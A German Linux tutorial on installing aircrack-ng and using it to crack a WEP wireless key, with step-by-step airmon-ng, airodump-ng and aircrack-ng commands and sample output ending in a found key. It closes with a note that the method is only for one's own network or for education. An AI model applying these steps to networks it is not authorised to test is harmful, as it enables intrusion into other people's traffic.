So knacken Sie einen drahtlosen WEP-Schlüssel mit AIR Crack

Dieser Artikel beschreibt kurz einfache Schritte zum Knacken eines drahtlosen WEP-Schlüssels mit der Aircrack-ng-Software. Dies kann durch Schnüffeln eines drahtlosen Netzwerks, Erfassen verschlüsselter Pakete und Ausführen eines geeigneten Verschlüsselungs-Cracking-Programms zum Entschlüsseln erfasster Daten erfolgen. WEP ( Wired Equivalent Privacy ) ist recht einfach zu knacken, da es nur einen Schlüssel verwendet, um den gesamten Datenverkehr zu verschlüsseln.

Das Grundprinzip ist, dass die Kommunikation zwischen zwei Knoten im Netzwerk auf der MAC-Adresse basiert. Jeder Host empfängt Pakete, die nur für die MAC-Adresse seiner eigenen Schnittstelle bestimmt sind. Das gleiche Prinzip gilt auch für drahtlose Netzwerke. Wenn jedoch ein Knoten seine eigene Netzwerkkarte in den Promiscuous-Modus versetzt, empfängt er auch Pakete, die nicht für seine eigene MAC-Adresse adressiert sind.

Um den WEP-Schlüssel zu knacken, muss ein Hacker Beispielpakete erfassen, die nicht für seine eigene Netzwerkschnittstelle bestimmt sind, und ein Crack-Programm ausführen, um Testschlüssel mit WEP-Schlüsseln zu vergleichen, die beim Versuch der Entschlüsselung mit erfassten Paketen gebündelt sind. Der Schlüssel, der zum Entschlüsseln erfasster Pakete verwendet wird, ist der Schlüssel, der vom drahtlosen Netzwerk verwendet wird, um die gesamte drahtlose Kommunikation mit den angeschlossenen Stationen zu verschlüsseln.

In den folgenden Abschnitten führen wir Sie durch die aircrack-ng-Installation unter Linux und zeigen Ihnen dann die schrittweisen Anweisungen zum Knacken eines drahtlosen WEP-Schlüssels. In der Anleitung wird davon ausgegangen, dass Ihre drahtlose Netzwerkkarte installiert ist und den Monitormodus unterstützt.

In diesem Tutorial lernen Sie:

  • So installieren Sie aircrack-ng auf wichtigen Linux-Distributionen
  • So knacken Sie einen drahtlosen WEP-Schlüssel mit aircrack-ng
 So knacken Sie einen drahtlosen WEP-Schlüssel mit Aircrack-ng

So knacken Sie einen drahtlosen WEP-Schlüssel mit Aircrack-ng

Softwareanforderungen und Linux-Befehlszeilenkonventionen
Kategorie Anforderungen, Konventionen oder verwendete Softwareversion
System Jede Linux-Distribution
Software aircrack-ng
Andere Privilegierter Zugriff auf Ihr Linux-System als root oder über den Befehl sudo.
Konventionen # – erfordert, dass bestimmte Linux-Befehle mit Root-Rechten ausgeführt werden, entweder direkt als Root-Benutzer oder mithilfe des Befehls sudo
$ – erfordert, dass bestimmte Linux-Befehle als regulärer nicht privilegierter Benutzer ausgeführt werden

Installieren Sie aircrack-ng auf den wichtigsten Linux-Distributionen

Um loszulegen, müssen Sie die Aircrack-ng-Software auf Ihrem System installiert haben. Sie können den entsprechenden Befehl unten verwenden, um das Programm mit dem Paketmanager Ihres Systems zu installieren.

So installieren Sie aircrack-ng unter Ubuntu, Debian und Linux Mint:

$ sudo apt install aircrack-ng

So installieren Sie aircrack-ng auf CentOS, Fedora, AlmaLinux und Red Hat:

$ sudo dnf install aircrack-ng

So installieren Sie aircrack-ng unter Arch Linux und Manjaro:

$ sudo pacman -S aircrack-ng

Crack wireless WEP key

  1. Zuerst müssen wir den Namen unserer drahtlosen Netzwerkschnittstelle identifizieren. Wenn Ihre drahtlose Netzwerkkarte korrekt installiert ist, zeigt ein Befehl iwconfig den Namen Ihrer drahtlosen Netzwerkschnittstelle an:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    Die Ausgabe zeigt, dass in unserem Fall der Schnittstellenname wlan0 ist.

  2. Schalten Sie als Nächstes den Monitormodus für die drahtlose Schnittstelle ein.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    Das Ergebnis des Befehls gibt Ihnen den Namen der neuen virtuellen Schnittstelle. Es neigt dazu, mon0 zu sein.

  3. Dump die Ergebnisse des Monitors in ein Terminal, so dass Sie sie sehen können.
    # airodump-ng mon0

    Sie können eine Tabelle mit Daten zu drahtlosen Netzwerken in Ihrer Nähe anzeigen. Sie benötigen nur Informationen über das Netzwerk, das Sie knacken möchten. Suchen Sie danach und notieren Sie sich die BSSID und den Kanal, auf dem sie sich befindet.

  4. Als Nächstes protokollieren Sie die Ergebnisse eines Scans in einer Datei. Dieses Erfassungsprotokoll wird von Aircrack benötigt, um später einen Brute-Force-Angriff auf das Netzwerk auszuführen. Um Ihre Aufnahme zu erhalten, führen Sie denselben Befehl wie zuvor aus, geben jedoch Ihre BSSID, Ihren Kanal und den Protokollspeicherort an.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    Geben Sie Ihre tatsächlichen Informationen ein, bevor Sie den Befehl ausführen, und lassen Sie ihn laufen.

  5. Als letzten Schritt knacken wir den WEP-Schlüssel mithilfe der erfassten Pakete und des aircrack-ng-Befehls. Alle erfassten Pakete werden jetzt in der Datei wep-crack-01.cap gespeichert.
    # aircrack-ng -z wep-crack-01.cap

    Ihre Ausgabe sollte ungefähr so aussehen:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
 aircrack-ng versucht, den WEP-Schlüssel unter Linux zu knacken

aircrack-ng versucht, den WEP-Schlüssel unter Linux zu knacken

Abschließende Gedanken

In diesem Handbuch haben wir gesehen, wie man aircrack-ng unter Linux installiert und die Software verwendet, um einen drahtlosen WEP-Schlüssel zu knacken. Denken Sie daran, dass dieser Prozess immer nur verwendet werden sollte, um Ihre eigene Sicherheit oder zu Bildungszwecken zu testen. Die Verwendung im Netzwerk eines anderen ist illegal.

Leave a Reply

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.